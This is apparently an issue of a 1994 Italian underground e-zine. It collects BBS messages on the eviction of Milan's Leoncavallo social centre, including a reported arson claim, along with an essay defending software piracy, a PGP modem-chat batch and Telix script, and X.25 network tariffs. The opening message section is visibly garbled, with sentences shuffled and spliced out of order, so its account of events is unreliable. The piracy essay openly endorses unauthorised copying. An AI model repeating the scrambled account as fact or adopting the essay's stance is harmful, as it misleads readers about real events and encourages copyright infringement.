MILANO 26 AGOSTO Un incendio ha distrutto la scorsa notte tre prefabbricati adibiti . La motivazione addotta da Palazzo Marino e' un palese pretesto per esercitare l'ennesimo arbitrio nei confronti dei centri sociali autogestiti.. MAI PRESA IN CONSEGNA DAL COMUNE.) di cui e' dotata da anni la struttura e la loro consegna all'autorita' comunale. l'eventuale autorizzazione per l'occupazione di suolo pubblico non avra' pertanto superficie superiore a otto piedi.. milano brucia Date: 26 Aug 94 16:47 Read: Yes Replied: No Mark: ANSA .. A tale scopo verra' organizzata la raccolta degli innumerevoli stratificati reperti (siringhe. poiche' l'uso della stessa area e' gia' stato autorizzato in passato per iniziative simili. la Protezione Civile.. e destinata ad usi sociali.30 il Centro Sociale Leoncavallo si rechera' in via Bertelli per iniziare il presidio permanente preannunciato nei termini di legge all'autorita' di Pubblica Sicurezza. Centro Sociale Leoncavallo Msg#: From: To: Subj: 6926 ECN Milano tutti leonka vive. 26 agosto 1994 COMUNICATO STAMPA Mentre qualche giornale straparla di agguati a base di pane secco.oneri di urbanizzazione. A tale proposito informiamo che nessun divieto e' stato posto a tale iniziativa non essendo tra i compiti istituzionali di qualsivoglia ufficio comunale regolare le liberta' politiche nella citta' di Milano. come gia' il suo sostituto Tordelli. Nel corso dell'iniziativa verra' denunciato lo stato si colpevole abbandono in cui versa l'anfiteatro sito ai margini del Parco della Martesana come del resto svariati altri immobili di proprieta' comunale. Msg#: From: To: Subj: 6925 ECN Milano tutti leo alla martesana Date: 26 Aug 94 16:21 Read: Yes Replied: No Mark: Milano. ricordiamo pero' che nessuna l'ha mai chiesta. che non vengano tenuti pericolosi concerti nel corso dell'iniziativa e informiamo fin da subito la vigilanza urbana. Domani alle ore 14. che la prevista proiezione serale verra' regolarmente effettuata con due grossi autonomi che reggeranno lo schermo e due piu' piccoli con in mano il proiettore. Ringraziamo sentitamente la vigilanza urbana per l'autorizzazione concessa per i giorni 27/28 agosto in piazza Lima e valutando se accettarla. In mancanza di ulteriori accadimenti il divieto imposto dalla vigilanza urbana riguarda soltanto la presenza di un banchetto atto alla raccolta di firme. ultima delle quali quella tenuta agli inizi di giugno dal Partito Umanista. uova e porfido (?) ben piu' serio attentato il Comune di Milano va preparando ai danni della liberta' di espressione ed associazione politica. l'autorita' di Pubblica Sicurezza. Contiamo sulla presenza del Sindaco Formentini per constatare.

questa notte abbiamo colpito il cantiere di via Leoncavallo. MILANO BRUCIA". Msg#: From: To: Subj: 6927 ECN Milano tutti da domani alla martesana Date: 26 Aug 94 16:48 Read: Yes Replied: No Mark: quindi da domani saremo al parco della martesana. "Ringraziamo per l'autorizzazione concessa in piazza Lima . c'era uno striscione con la scritta "LEONKA VIVE. Sul Leoncavallo non costruirete niente. in via bertelli. Oggi il centro sociale ha comunicato che domani si rechera' in via Bertelli all'interno del parco della Martesana per denunciare lo stato di abbandono in cui versa l'anfiteatro e altri immobili comunali. Un cancello in ferro all'angolo fra via Mancinelli e via Leoncavallo. Stamane alla redazione milanese dell'ANSA e' giunta una telefonata di rivendicazione: "questa e' una rivendicazione. Secondo i primi accertamenti condotti dalla polizia sul luogo non sono stati trovati segni di liquido infiammabile. mm gorla . dal quale si accede al cantiere e' stato trovato aperto. L'impresa Morganti di Milano che coordina i lavori per la costruzione di un condominio sull'area che per circa vent'anni ha ospitato la sede storica del centro Leoncavallo non ha ancora fatto un bilancio dei danni.e valutando se accettarla ricordiamo pero' che nesuna l'aveva mai chiesta". non e' uno scherzo . Contro il divieto a manifestare.bus 56 se non ci sara' consentito saremo altrove Msg#: From: To: Subj: 6928 snd All leo :-) Date: 27 Aug 94 01:04 Read: Yes Replied: No Mark: i vigili urbani hanno piazzato fin da questo pomeriggio una macchina proprio davanti all'anfiteatro di parco . appeso ad un sottopasso in viale Forlanini. Poco distante.hanno scritto i leoncavallini in un comunicato diffuso oggi . il gruppo stava forse preparando una protesta contro il sindaco.ha detto una voce maschile .a uffici e spogliatoi per operai nel cantiere edile che sorge in via Leoncavallo a Milano nell'area della vecchia sede dell'omonimo centro sociale. Secondo la Digos e i vigili urbani. pezzi di pane secco e una tanica contenente detewrsivo. Ieri l'amministrazione comunale aveva reso noto di non aver concesso l'autorizzazione al presidio in via Bertelli dando il via libera invece per una raccolta di firme in piazza Lima. ma non viene esclusa la matrice dolosa dell'incendio. uova. Le fiamme si sono sviluppate verso le 3 e l'intervento dei vigili del fuoco e' durato circa un'ora e mezza. Intanto non e' stata presentata alcuna denuncia nei confronti dei giovani del centro leoncavallo. Azione Diretta". sorpresi ieri nei pressi dell'aeroporto di Linate proprio mentre arrivava in aereo da Olbia il sindaco di Milano Marco Formentini. che ammonterebbero comunque a qualche decina di milioni di lire. la strada che dall'aeroporto porta verso il centro citta'. Dietro un cespuglio sono stati trovati cubetti di porfido.

martesana ( paura. cooperativa vicino al PDS e gli arresti di alcuni dei dirigenti del partito in relazione allo scandalo dell'ex Robuschi). Il nostro sindaco e il suo partito . eh ?!? ) l'appuntamento e' comunque confermato :-) Msg#: From: To: Subj: 7008 snd All sgomberato c. per ordine del sindaco Lavagetto (PDS) hanno sgomberato il centro sociale autogestito "barricate" dopo che l'occupazione si era protratta per piu' di 9 mesi per la quarta volta in meno di due anni i poteri forti della citta' (massoneria. Il nostro centro sociale e' stato un tentativo di dare un'alternativa umana e socialmente positiva a un grande spazio inutilizzato e destinato allo sfacelo o alla speculazione. Promettiamo al sindaco e al PDS che lui ed "i suoi amici" pagheranno tutte le conseguenze politiche di questo sgombero. unione industriali. nella scuola.legati a doppio filo all'unione industriali e ai poteri occulti della citta' legittimano con la loro partecipazione attiva le manovre piu' sporche di speculazione edilizia sulle "aree dismesse" (vedi ruolo della SINCO. polizia e vigili urbani. barricate a parma Date: 27 Aug 94 16:49 Read: Yes Replied: No Mark: SGOMBERATO IL CSOA BARRICATE (Parma) Martedi' 23 Agosto.PARMA Msg#: From: To: Subj: 7009 snd All leoncavallo alla martesana Date: 27 Aug 94 16:56 Read: Yes Replied: No Mark: questo pomeriggio alle 14. partiti.s. Digos. La contraddizione e' forte e si ripropone ogni giorno: ieri un altro morto di eroina ci ha fatto comprendere ancora una volta come anche Parma non abbia un'alternativa sociale e culturale alla disperazione ed alla solitudine. polizia) usano la violenza per colpire il bisogno di spazi di autogestione e di organizzazione delle lotte proletarie contro la vita alienata che il sistema del dominio impone ogni giorno sul lavoro. nel tempo libero.30 (come da programma) la comunita' nomade del leoncavallo si e' felicemente insediata presso l'anfiteatro del parco della . Il massone Lavagetto e i suoi servi non si illudano di risolvere in questo modo la questione degli spazi sociali. La differenza del'"progressista" Lavagetto ed il leghista Formentini che ha sgomberato il csoa Leoncavallo sono inesistenti: in realta' Lavagetto e' come Formentini.PDS . Nessuna giustizia nessuna pace collettivo spazi sociali CSOA BARRICATE . Il "nostro" sindaco e' poi stranamente il notaio che sancisce l'operazione di acquisto dell area ex Robuschi da parte del consorzio di imprenditori "La corte".

Altro che occuparsi di giovani: un vero e proprio scambio politico con interi settori del PPI (leggi ex dc). Che . leoncavallo Date: 28 Aug 94 02:33 Read: Yes Replied: No Mark: FORMENTINI COME BRAMIERI Che Formentini fosse "il sindaco di tutti i milanesi" lo scrivono da tempo i quotidiani ma che fosse anche il comico (e che comico!) di tutti i milanesi questo dovevamo ancora scoprirlo. Che usa la macchina amministrativa e burocratica come una schiaccia sassi per azerare qualunque foerrma di dissenso politico e sociale presente sul territorio. in attesa forse di tempi piu' propizi alla speculazione! Che mentre chiude i centri sociali autogestiti e interamente autofinanziati discute la "privatizzazione" di quelle poche strutture territoriali esistenti (vedi centri giovani.. accorrete numerosi !!! Msg#: From: To: Subj: 7057 snd All comunicato c. in via bertelli (venendo da via padova si gira in via agordat e poi sempre dritto . Per quanto riguarda poi il "disprezzo della gente" crediamo invece che sempre maggiore sia l'insofferenza verso l'inettitudine dell'amministrazione leghista. Centro Sociale Leoncavallo . Ci sarebbe solo da ridere. Come dobbiano altrimenti interpretare le dichiarazioni pubbliche apparse oggi sui quotidiani se non come barzellette della miglior tradizione? Ecco cosi' che un contenitore di detersivo (perche' anche i leoncavallini si lavano??!!!) diventa subito "diserbante (che e' infiammabile)". Che spende miliardi per finanziare iniziative culturali d'elite e impedisce lo svolgersi di manifestaazioni popolari a bassi costo orgaizzate da "liberi cittadini".) affidandole con cospicui finanziamenti alla Compagnia delle Opere. ecc.sono 200 m ) poiche' il comune di milano ha proibito la raccolta di firme prevista. E le uova: anche se comprate in giornata quelle degli autonomi sono sempre "marce"! Che la signora Augusta poi non si senta tranquilla "nemmeno quando va dal parrucchiere". e basterebbe al "sciur sindich" e signora girare la citta' in tram invece che scortati sulle loro auto di rappresentanza. questa la faremo un'altra volta :-))) il posto e' incantevole.martesana.s. beh e' un problema tutto suo. se non fosse che affermazioni cosi' deliranti (purtroppo non dettate solo dal sole d'agosto) servoo a coprire l'inefficienza di un sindaco e di una giunta che nulla hanno fatto per il recupero di intere strutture e aree verdi di proprieta' del comune sotratte ad un uso sociale e abbandonate al piu' completo degrado.. Noi non possiamo fare altro che consigliarle di cambiare parrucchiere. centri territoriali. quattro volantini appesi allegramente per le strade di Courmayeur diventano una "spedizione squadristica".

ancora nel trascorso mese di luglio. in tutto il paese hanno seguito le vicende dell'agosto milanese e a quanti nei prossimi mesi saranno chiamati per propria. il divieto reiterato imposto da mesi all'iniziativa politica. Tale processo non puo' eesere stato intrapreso senza la precisa intenzione di marginalizzare questo orizzonte e radicalizzarne le forme di lotta. della generale privatizzazione dei servizi. . A cominciare da quelle zone dove le elezioni amministrative prima e le politiche dopo hanno consegnato un identico segno politico tra potere centrale e locale. Con lo sgombero del C. Analoghi segnali ci giungono da piu' parti del paese. personale o collettiva . presidio. Abbiamo ribadito . La bandiera della lotta all'illegalita' si e' avvitata e ha sconfinato nel diritto di esercizio delle liberta' politiche e sindacali.. Le trasformazioni produttive degli ultimi decenni hanno evidenziato nuovi soggetti sociali portatori di forme proprie di organizzazione politica e della rappresentanza autorganizzata nei luoghi del lavoro.. le realta' presenti hanno definito il seguente comunicato. del reddito. sempre piu' tese all'intimidazione. a rispondere alla negazione di diritti fondamentali sul piano delle condizioni materiali e delle liberta' politiche e di espressione culturale. hanno pertanto una gravita' particolare. Leoncavallo e il parziale smantellamento del C. affiancandosi ad un uso politico della magistratura che ha prodotto nell'ultimo anno. anche se in un quadro di differente organicita'. sul solo territorio milanese. l'esclusione sistematica delle associazioni e delle realta' di base da parte della macchina burocratica dell'amministrazione comunale piegata ai fini della battaglia politica. Sergio Spazzali Hachmi di Baggio il 19-20-21 agosto. volta quest'ultima. che un attacco all'esperienza dei centri sociali milanesi avrebbe avuto il significato di una rottura profonda con un intero tessuto sociale. fosse essa corteo. situazione. alla distruzione delle forme di visibilita' e organizzazione che questi nuovi soggetti esprimono. dell'istruzione.s.s.s. decine di processi. tutte a danno dei soggetti subalterni.Msg#: From: To: Subj: 7134 Date: 30 Aug 94 01:32 ECN MILANO Read: Yes Replied: No Tutti Mark: x una manifestazione a milano il 10 settembre PER UNA MANIFESTAZIONE NAZIONALE A MILANO IL 10 SETTEMBRE A conclusione di tre giorni di iniziativa politica e di dibattito tenutisi presso il C. in una situazione in cui alle movenze generali. oltre 800 denuncie. rivolto principalmente a quanti. si e' velocemente assommata la gestione della citta' operata dalla Lega Nord che ha visto la progressiva compressione delle opportunita' di espressione politica e culturale. svariate condanne estese sempre piu' ai soggetti vari con motivazioni pretestuose. sui temi della casa. pensiamo. Spazzali si sono chiariti ulteriori elementi del programma con il quale la destra politica e sociale intende governare il paese. L'attacco ai centri sociali. festa.

. A qualunque prevedibile divieto. Una duttile allenza. che occupano i centri del potere come fonte di interesse privato. Una generazione che dovra' assumersi dunque la responsabilita' di un rapporto con "l'illegalita' " crescente dei propri comportamenti . Non possiamo dunque maggiormente indugiare dal mettere in campo un impegno che assuma la forma. facendo uso della ragione. che costringono il lavoro vivo presente saccheggiando quello passato. percorsa e presidiata da altrettanti mesi dalle truppe del Ministero degli Interni. a Milano. . il 10 settembre. a ribadire ulteriormente il dato di una citta' sottoposta da molti mesi ad un regime speciale per l'ordine pubblico. e' la testimonianza palpabile della fragilita' del suuo corpo politico dirigente e della sua amministrazione. Abbiamo inoltre rilevato in questi mesi il definitivo decesso dell'opposizione della sinistra istituzionale nella citta' di Milano. quanto quello all'autogestione. limando i redditi reali e le pensioni. ancora una volta. il divieto e' quindi da considerarsi un vero e proprio attacco nei confronti di chi. Una iniziativa all'interno di tre giornate di dibattito e spettacolo (nelle date del 9/10/11 settembre) sul quale grava gia' l'ombra di un ennesimo divieto. ridetermina l'opposizione in questo paese attraverso rapporti di forza stabili. Il governo militare della citta'. nel complesso... nei mesi a venire. di una mobilitazione generale della variegata presenza autogestionaria. autorganizzata. Gia' nei mesi passati quest'area politico sociale ha avuto la forza di formulare. Una presenza questa in balia dei forti poteri che ridisegnano il territorio. viene posta di fronte a dinamiche di esclusione. anticapitalista. sul complesso dei temi evidenziati in questo breve comunicato. accingendoci a predisporre gli strumenti affinche' tale domanda non rimanga tale.C'e' un'intera generazione politica che. dicemmo. in grado di rispondere alla necessita' di opposizione radicale che questa fase politica ci consegna. come parte di un piu' generale quadro nazionale. e dall'altro il compito di reinventare gli spazi e le forme della propria agibilita' politica sul territorio. Ci sembra di poter proporre. un corteo nazionale he apra. la stagione delle lotte sociali. una rinnovata capacita' progettuale alla ricerca di un tessuto possibile tra i fili delle sue molte componenti. all'impossibilita' di esprimere l'opposizione nelle infinite emergenze di cui e strumentalmente piena la storia di questo paese. di fronte all'esercizio di un diritto quale quello di manifestare un'opposizione reale che va dall'aurtorganizzazione all'autogestione fino all'associazionismo e alle molteplici forme della rappresentanza e della democrazia diretta. Per intanto invitiamo tutti coloro cui questo appello e' rivolto a mobilitarsi affinche' venga affermato il diritto della liberta' di organizzazione ed espressione politica. che liquidano il diritto alla casa come quello alla salute. sapremo rispondere in modo adeguato e di massa. CHI GOVERNA CHI? E' la sfida che abbiamo aperto nella discussione di questa settimana. nella citta' di Milano e in generale nel paese.

pacchetti a condizioni speciali. scriveteci pure. rapido e capillare supporto al beta-testing. assistenza post-vendita. stimolato in modo positivo il mercato: se il produttore non avesse avuto questa sorta di nemico fantasma contro cui combattere. Settembre 1994 . Abbiamo trovato questo messaggio nelle aree CYBERNET.R. consulenze. Leggetelo. IN PGP. E' semplicemente FANTASTICO. pur considerato l' inevitabile rischio di copie abusive. esprimo il mio parere sulla strategia di tutela software intapresa dalla suddetta associazione. ma e' priva di fondamento la dichiarazione che il fenomeno finisca col danneggiare l'utente.] Con l'augurio che il testo di questo msg finisca nelle mani di qualche responsabile della BSA. Le incriminate reti telematiche amatoriali sono oggi.Articolo 12 --------------------------------------CHI TUTELA DANNEGGIA ANCHE TE ! di M B F ----------------------------------[N. ed e' storia.. La duplicazione del software. 28 Agosto Le realta' promotrici della tre giorni antifascista e antirazzista del 19-20-21 Agosto e della manifestazione del 10 Settembre.d. . La pirateria software puo' danneggiare rivenditore. giammai avrebbe offerto all'utente gadgets.. e se avete commenti in proposito. produttore e autore del programma. ha sempre. ed in riferimento all'apertra dello speciale "Italian crackdown" (Decoder 9). Smentiamo l'"originale" slogan "Chi copia danneggia anche te !". discussione e distribuzione demo del prodotto che inevitabilmente spinge diversi utenti all' acquisto dell'originale. agli indirizzi di posta elettronica che troverete in fondo alla rivista. sarebbe da fargli un MONUMENTO. allo shareware e ad altre strategie di collaudo e vendita che nessuna software house si sarebbe potuta singolarmente permettere: una colossale rete di presentazione. E ricordatevi che cerchiamo sempre collaboratori !!! Dupree's Paradise ----------------------------------------------------------------The Black Page .L'APPUNTAMENTO PER TUTTI I COMPAGNI/E E' PER LA MANIFESTAZIONE DEL 10 SETTEMBRE A MILANO E PER UNA TRE GIORNI DI MUSICA MA ANCHE DI DIBATTITO IN LUOGO ANCORA DA STABILIRE.Numero 0. PER I COMPAGNI/E CHE VOGLIONO VENIRE A MILANO FATE ARRIVARE UN FAX ALLO 0339226820360. sorta di concorrente invisibile al dominio delle software houses. -----------------------------FINE MESSAGGI--------------------------------Questi sono i messaggi che ho trovato . che ne pensate ? Io ritengo che la situazione sia semplicemente TERRIFICANTE ! Se volete dire la vostra scrivete pure alla ns redazione. Milano. il piu' grande.

ben lungi dallo scendere in reale concorrenza tra loro. che le associazioni di categoria. in questo modo il programmatore evita di ricalcolarsi ascissa ed ordinata di rilevazione evento in piattaforma grafica ed incassa n volte i diritti vendendo lo stesso modulo allo stesso utente. se ne sono sempre fottute dell'utente e. che obbligano l'utente a costose modifiche dell'hardware. e prendendo atto del fatto che tale associazione non si e' mai premurata di mettere in discussione gli elevatissimi profitti concedendo agli enti pubblici software a condizioni agevolate (le proposte fatte sono. dalla diffusione amatoriale del software l'utente ha sempre tratto vantaggi ed i produttori. peraltro contenti delle royalities miliardarie che ogni giorno piovono sul loro capo. Se qualcuno di voi ama testare il software. Piu' che i realizzatori di piattaforme. L'esperienza italiana ha dimostrato. e' inoltre piuttolto radicata l'abitudine di far proliferare il software commerciabile passando al collegatore gli stessi moduli oggetto. Indimostrabile ma credibile. dalla benzina alle assicurazioni. Ora sapete cosa vuole proteggere la BSA.In ogni forma ed in ogni caso. il contributo nascosto dato (in cambio di altri favori) dai mercanti del software a quelli dell'hardware mediante la scelta di architetture sw. sono questi programmatori di secondo livello a premere oggi per la tutela del loro "ingegno" chiedendo inoltre la brevettazione dell'algoritmo come supplementare metodo per realizzare denaro (come se gli eredi di Piatgora chiedessero una somma a chiunque volesse calcolare l'ipotenusa dati i cateti). con le modifiche necessarie e sufficienti a non far capire al cliente che nascoste in due o tre etichette distinte ci sono in realta' le stesse routines. Ebbene. che non fanno eccezione. anche. infine. tutt'altro che indispensabili ed insostituibili. in ter- . La disposizione delle icone in utilities del tutto diverse. i singoli produttori si sono trovati immediatamente concordi nell'aumentare i prezzi e diminuire la qualita' dei servizi. ottenuto il controllo totale del mercato. Il realizzatore di businnes software si appoggia al sistema operativo che gentilmente gli processa tutte le funzioni di interfaccia utente senza fargli spendere due righe di codice. Si sono fatti conoscere senza spendere una lira in pubblicita' e questo porta inevitabilmente a contatto gli utenti con i prodotti originali. non aspettano altro che la legge sulla tutela li lasci padroni del campo in modo da poter imporre prodotti scadenti a prezzi maggiorati. che oggi tra i miliardi incassati piangono miseria. smentira' con facilita' il secondo dogma su cui poggia l'attuale concetto di tutela del medesimo: la leggenda secondo la quale il programmatore si farebbe un culo grande come una portaerei per realizzare il prodotto. o in alternativa all'incredibile numero di librerie che un linguaggio ad alto livello possiede. I produttori di software. i programmi "leggeri" (i videogiochi. e' straordinariamente simile. differentemente ordinati. ben sapendo che l'utente sara' costretto ad accettare per mancanza di alternative: i segnali premonitori in questa direzione (tipicamente riservati al nostro Paese) non mancano. Altre simpatica pratica introdotte dagli sviluppatori di software e' l'espansione artificiale di un file (che viene gonfiato allocando aree di memoria inutili o del tutto superflue) in modo da impressionare l'utente con il numero di dischetti che costituisce l'applicativo e giustificare il costo. per intenderci) comportano spesso e volentieri una difficolta' di realizzo abissalmente superiore al gestionale da prezzo milionario tanto decantato. Essendo lo Stato il suo cliente ideale (i ministeri italiani comprano qualunque porcata di prodotto tanto paga il contribuente).

si proibisca la duplicazione a tutti i livelli. Lo Stato legifera e il cittadino scuce.--Release 1. multe comprese. Rompetevi le corna. li paghiamo noi tutti. Settembre 1994 .R. mentre una software house che va a rompere i coglioni in una scuola elementare perche' uno (UNO !) dei files installati non e' registrato e poi rilascia un eseguibile con bug. dalle duplicazioni sbagliate dell'importatore ???? Al massimo vi ridanno una copia del software o vi fanno lo sconto (!) sulla release successiva. Perche' alla software house e' stato concesso il diritto di chiedere centinaia di biglietti da mille per una manciata di righe di compilato mentre se il mio fornaio chiede 50mila per una pagnotta arrivano (giustamente) i Carabinieri ?? Qualcuno ha la coda di paglia.com (Jim Bowery) Subject: PGPCHAT Release 1. teme che l'utente abbia il materiale per fare dei confronti e per scoprire le sporche manovre dei signori del software.d. Ma chi tutela l'utente dai bugs del programmatore. dai collaudi non fatti. dai crash di sistema per errata previsione dello stack.'( ] ----------------------------------------------------------------The Black Page . essere rovinata per sempre. dovrebbe sputare sangue per pagare un fiume di danni. riesaminate lo slogan e chiedetevi se di fatto il contribuente non sia piu' danneggiato da questa forma di tutela che prevede che l'utente paghi e taccia. si promuova una campagna delatoria nazista del tipo "denunciate il vicino di casa che copia!" (non e' uno scherzo. dalle documentazioni approssimative. I costi dell'adeguamento alla normativa di tutti gli enti pubblici italiani..0 Date: Mon.0 A MODEM-CHAT FACILITY WITH PRETTY GOOD PRIVACY by Jim Bowery . Sono commosso ! Sigh ! . dai mostruosi errori di traduzione.Numero 0. 6 Jun 1994 19:45:05 GMT PGP WIN-DOS CHAT --. purtroppo! Ci sono i tagliandi prestampati per la denuncia su giornali e riviste) cosi' finalmente anche i prodotti scadenti troveranno spazio. l'utente sara' fottuto ancora una volta e gli adepti della BSA continueranno a sguazzare nel denaro ridendo alla faccia nostra! M F B [N. una vergogna).mini di mercato reale.) ] From: jabowery@netcom. allora si chiudano le reti.Articolo 13 [N.. Questo file e' in INGLESE. *.d.r...

CUT HERE ------------------------FILE: recvpgp.PGP userid of person you are sending to. INSTALLATION I) You should probably make sure your PGP "config.exe" Telix script compiler with it.CUT HERE ------------------------- . rem Be sure to set PGPPASS in environment.bat The following batch file should be placed in your PGP directory with the name sendpgp.bat. This has only been tested under Windows NT so if it doesn't work under a non-preemptive Windows like 3. It requires Telix (the comm program). get a copy and make sure you have the "cs.1. It requires PGP.bat.txt :def if exist sendpgp. so if you don't have Telix.bat The following batch file should be placed in your PGP directory with the name recvpgp.txt %1 del sendpgp.PGP Win-DOS Chat is a sloppy little facility which allows people to conduct a rather slow 2-way PGP-encrypted chat via modems. ------------------------. FILE: sendpgp.txt" file contains a line that says: VERBOSE = 0 This is to keep the PGP "noise" messages from interfering with your chat. It uses default key rings and for decryption it uses your default private key. that's probably why. You should be familiar with encrypting and decrypting messages with PGP before you attempt to run this facility. Follow the directions for the installation of each of them. ------------------------.asc goto def pgp -esa sendpgp.CUT HERE ------------------------echo off rem Run this with one argument -. II) There are 3 script files included below.txt goto abc ------------------------. :abc echo Enter PGP chat message (end with CTRL-Z): copy con sendpgp.

} } type_file(str fname) { int f.0). . fdelete("\pgp\sendasc. if(track_hit(0) == t1){ capture("*CLOSE*"). int ichar. } delay(10).txt"). capture("\pgp\recvpgp. while (1) { terminal().asc")."\pgp\sendasc.asc". str buf[100]. Be sure to set PGPPASS in environment. :abc if not exist recvpgp. lines_sent = 0.0.txt type recvpgp.CUT HERE ------------------------FILE: pgpchat. ------------------------. frename("\pgp\recvpgp. capture("\pgp\recvpgp.asc".txt"). you will have to edit "pgpchat.slt.pgp goto abc pgp recvpgp.slt The following Telix script should be placed in your Telix directory with the name pgpchat.txt del recvpgp.pgp -o recvpgp.echo off rem Receives PGP chat messages.txt del recvpgp.slt This will generate a file named "pgpchat. Then you should execute the command: C:\telix>cs pgpchat. str buf[80].asc"). type_file("\pgp\sendasc.pgp").slc" which is your Telix script executable.CUT HERE ------------------------main() { int t1. t1=track("-----END PGP MESSAGE-----".pgp goto abc ------------------------.buf)){ frename("\pgp\sendpgp. } if(filefind("\pgp\sendpgp.asc"."\pgp\recvpgp.txt").slt" and change all references to the "\pgp\" path to the path of your PGP directory relative to your Telix directory. If your PGP directory is somewhere other than "\pgp\" relative to your Telix directory.

} ////////////////////////////////////////////////////////////////////////////// ------------------------. 2) In one window. enter the PGP directory and execute: C:\pgp>SET PGPPASS=<your pgp pass phrase> C:\pgp>recvpgp 3) In another window. while (1) { if (fgets(buf. host_send("^M^J"). } host_send(buf). if (!f) return -1. bring up three DOS Prompt windows. enter the PGP directory and execute: C:\pgp>SET PGPPASS=<your pgp pass phrase> C:\pgp>sendpgp <userid> . } } ////////////////////////////////////////////////////////////////////////////// host_send(str outstr) { cputs(outstr).f = fopen(fname. host_send("^M^J"). terminal(). return 1. 80. "r"). f) == -1) { fclose(f).CUT HERE ------------------------- STARTING UP PGP WIN-DOS CHAT 1) >From the Windows Program Manager.

If so. You should see the prompt: "Enter PGP chat message (end with CTRL-Z):" 8) Do what the prompt says. Sometime later. enter the Telix directory and execute: C:\telix>telix 5) To test out your end of the chat system without bothering your friends. Ignore these errors. CAVEAT: You WILL see errors crop up in about 1 in 5 test messages that you try to send.bat" window. make sure your modem is echoing your commands by typing: ATZ<cr> It should echo the "ATZ" on your terminal screen and respond with "OK". from time to time. It should then begin encrypting what you typed and return you to the prompt. you should see a modem response in the middle of the PGP encryption block on the Telix screen and PGP error messages later cropping up on the "recvpgp" screen. When this happens. 4) In the third and last window. 6) Press ALT-G in Telix and enter "pgpchat" at the prompt to activate the Telix script. 7) Activate the "sendpgp.bat" window. . see an "AT" command in the middle of a PGP encyption block. You should then see the Telix window scroll (painfully slowly) a PGP encryption block. This is due to the fact that the "self-test" is using the modem's character echo to simulate the presence of another user and the modem will. your end of the system is working.Where <userid> is the PGP userid you would use to encrypt a message to the person you will be chatting with.bat" window should display the same message you entered in the "sendpgp. the "recvpgp.

13) Activate the "sendpgp. Press CONTROL-Z This should cause the entire text file to be typed into your "sendpgp.bat" window.bat" window. hold off on executing the "pgpchat" script. TIPS ON USAGE I) Don't send more than about a message per 30 seconds. Reactivate the "sendpgp. Press SHIFT-SPACE. II) You can send text files by the following procedure: 1) 2) 3) 4) 5) 6) 7) 8) Go into Windows' Notepad program and open the file you want to send. but this time. . Press "p". 12) Once the modem connection is established with your friend.9) Go to the Telix window and press ALT-X to quit Telix. Press "e". press ALT-G in Telix and enter "pgpchat" at the prompt to activate the Telix script.bat" window. Press CONTROL-INS to copy the file to your clipboard. The flow control is there but it is minimal. If you send faster than that. Press SHIFT-CONTROL-END to select the entire file. the PGP data stream might get backed up. 11) Dial your friend's modem and make sure you are connected. just kill all three DOS windows.bat" window and start typing. When you are ready to quit. encrypted and sent to your friend. You should see your friend's messages pop up in the "recvpgp. 10) Reenter Telix.

Aggiornato al 31.5 fino a 200.000 seg.94 X.000 seg.36 oltre 200. 2 fino a 200. una buona NUI affittata potrebbe anche essere "fattibile".21 . 5. 20 Collegamento su ITAPAC: per ogni minuto per ogni segmento L.Articolo 14 -------------------------LE NUOVE TARIFFE DI ITAKAZ -------------------------- Sembrano convenienti.2 oltre 200. Settembre 1994 .Numero 0.7 L. ----------------------------------------------------------------The Black Page ..III) Your and your friend may have a bit of trouble reading more than 25 lines of text at a time since the "recvpgp.28 COMMUTATO ============== Tariffe di Accesso ================== Canone di abbonamento menisile ^^^ Modem Multistandard Traffico Nazionale Tariffa telefonica per il collegamento alla centrale ITAPAC per ogni chiamata L.500 (vedi listino modem) Riduzioni sul traffico ---------------------Dalle ore 22 alle ore 7 di ogni giorno. 0. il sabato e i giorni festivi si applicano le seguenti tariffe ridotte: per ogni minuto per ogni segmento L.bat" window just scrolls off the top (its just a DOS window after all)./mese L. Date un'okkiata . 20 occupazione porta (per ogni minuto) L.000 seg.000 seg. ma non ancora. 0. 12. You might want to run that DOS window under one of the "scroll buffer" programs that lets you scroll back and see what has scrolled off the DOS prompt window./mese L./mese L. 0. 1..2./mese L. se usata con parsimonia.

288 / 10 seg.93 TRAFFICO INTERNAZIONALE ======================= Le tariffe di seguito descritte valgono per ogni tipo di accesso. o fraz. NUA 26100298 (Id Itapac Itapac al login) ----------------------------------------------------------------The Black Page . o fraz.Articolo 15 AT OK ATD CONNECT 28.8 / 10 seg. 118./mese L. 86. oltre 200 ore/mese L. 56. parametri L./mese L. o fraz. Traiffa a volume ---------------^^^ fino a 200.618/min. Tariffa a volume ---------------fino a 200.000 seg. 60.48/min. Paesi Extraeuropei Tariffa a tempo --------------fino a 200 ore/mese L. Europa e Bacino del Mediterraneo Tariffa a tempo --------------fino a 200 ore/mese L. o fraz. 51. 35 per ogni chiamata virtuale documentata L.000/mese L. opzioni.16 / 10 seg. Fonte dell'Informazione : Info Itakaz./mese L.84 / 10 seg.Prestazioni opzionali --------------------Gruppo Chiuso d'Utente (CUG) utente responsabile utente di CUG Documentazione Addebiti Modifica NUI (password).4/min. Settembre 1994 . 50.4. o fraz.000/mese L.800/VAF/FAN/CULO E adesso sorbitevi anche queste ========================================================================= SSSSSS TTTTTTT RRRRR OOOO N N ZZZZZZ AAAA TTTTTTT EEEEEE !! S T R R O O NN N Z A A T E !! S T R R O O N N N Z A A T E !! . 138. 36. oltre 200 ore/mese L. oltre 200.018/min. 198. o fraz oltre 200. o fraz Abbiamo anche evidenziato un po' di errori di stampa. 1.000 seg./mese L.Numero 0. o fraz.000 Aggiornato al 1.000 seg. 83.000 seg.

. ma un insieme di cose prese qua' e la' in vari posti...\\ YY o ' O <---. /oo\\________ \\ / \\ \\/ / \\ <---. o favorevoli.. ecc. col permesso di Sxs useremo questa sua meravigliosa creazione come Banner della nostra rubrichina. e NON i concetti) clericale e religiosa in genere... ^^ ^^ Beh. hai l'indirizzo Email a cui scrivere ! .e questa e' la cacca. Bene.questa e' la mucca. Sta a voi distinguere le EMERITE STRONZATE dalle INFO ELITE dai MSG Divertenti a quel che cazzo volete. Che non e' necessariamente una rubrica di stronzate.. quei FOTTUTI COGLIONI della Redazione di TGM che SPUTTANANO i file .. 2230 Del: 02-06-94 21:03:02 Di: PhalanX in nome di una ristretta cerchia di persone che irridono al clericalismo e che aborriscono chiunque tenti di giustificare l'essenza delle cose in base a preconcetti mistici. dicevo. Mi candido alla ..queste sono un paio di corna. per mettere invece il nome ed il numero della loro MERDOSA BBS DEL CAZZO. \\_ ___\\_ /. si comincia !!!! ------------------------------------------------------------------------------------------------Messaggeria Black Jack (compianta NUA 21124062 :( ora solo da VDT ma non so la pagina) Area : Sysop MSG N.SSSSS T RRRRR O O N N N Z AAAAAA T EEEEE !! 